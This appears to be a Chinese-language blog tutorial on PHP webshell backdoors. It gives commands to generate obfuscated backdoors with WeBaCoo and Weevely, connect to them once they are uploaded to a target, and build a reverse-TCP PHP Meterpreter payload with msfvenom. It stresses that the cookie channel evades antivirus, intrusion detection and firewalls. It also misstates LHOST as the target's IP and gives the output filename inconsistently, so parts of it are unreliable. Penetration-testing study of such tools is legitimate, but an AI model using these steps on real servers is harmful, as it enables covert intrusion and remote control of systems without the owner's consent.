WeBaCoo
WeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可以在客户端和服务器端实现执行代码的网页终端。
WeBaCoo有两种工作模式:
- Generation(生产线模式):指定-g选项可进入这种模式。用户可以在这种模式下制作PHP代码的payload
- Terminal(终端模式):指定-t选项可进入这种模式,用户可以在这种模式下连接到被测主机的后门程序。
WeBaCoo的精妙之处在于,Web服务器和客户端之间的通信载体是Cookie。这就意味着多数的杀毒软件、网络入侵检测/防御系统、网络防火墙和应用程序防火墙都无法检测到后门的所在。
WeBaCoo的HTTP Cookie中以下三个参数最为重要:
- cm:以base64编码的shell指令
- cn:加载着编码后输出内容的Cookie名称
- cp:封装编码后输出内容的分隔符
如需启动WeBaCoo程序,可以在终端输入下述命令:
与生成模式有关的命令行选项如下:
| 选项 | 描述 |
| -g | 制作后门代码 |
| -f | 后门所需要的PHP功能 system(default) shell_exec exec passthru popen |
| -o | 指定生成的后门程序的文件名 |
如果要使用默认的设置,生成名为test.php的PHP后门程序,并使用WeBaCoo的代码混淆技术对后门进行处理,那么可以使用下述命令
webacoo -g -o test.php
文件test.php内容如下:
而后,包这个文件上传到被测主机上去
接下来就可以使用下面的命令连接到被测主机的后门程序了:
webacoo -t -u http://ip/test.php
WeBaCoo后门的客户端和服务器端的通信是不易发现的、
Weevely
Weevely是一款具有高隐蔽性的针对PHP平台的WEBShell。它实现了SSH风格的终端界面,并有大量自动化的模块。测试人员可用它来执行系统命令、远程管理和渗透后期的自动渗透界面。
Weevely的主要用途是:
- 生成混淆的PHP backdoor
- 在图像文件中追加多态后门程序,并可以通过。htaccess文件赋予图像文件执行权限。
- 生成后门。htaccess文件。
- 可通过help选项列出程序的全部模块和生成工具
使用夏磊指令可以生成混淆PHP backdoor,并将后门保存为display.php
weevely generate password display.php
之后还是以一样,上传到目标机器上
之后链接WEBshell即可
PHP Meterpreter
Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP webShell。利用目标的漏洞(诸如常见的注入、文件上传漏洞)之后,再把它的shell传到目标主机即可。
Metasploit 的msfvenom工具可以制作PHP Meterpreter,具体指令如下:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.x.x -f raw >php-meter.php
上述指令各选项的作用如下:
-p :指定payload为php/meterpreter/reverse_tcp
-f:设置输出格式(raw)
LHOST :设定目标主机的IP地址
Metasploit会把生成的PHP Meterpreter保存为文件php-mter.php。
382
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
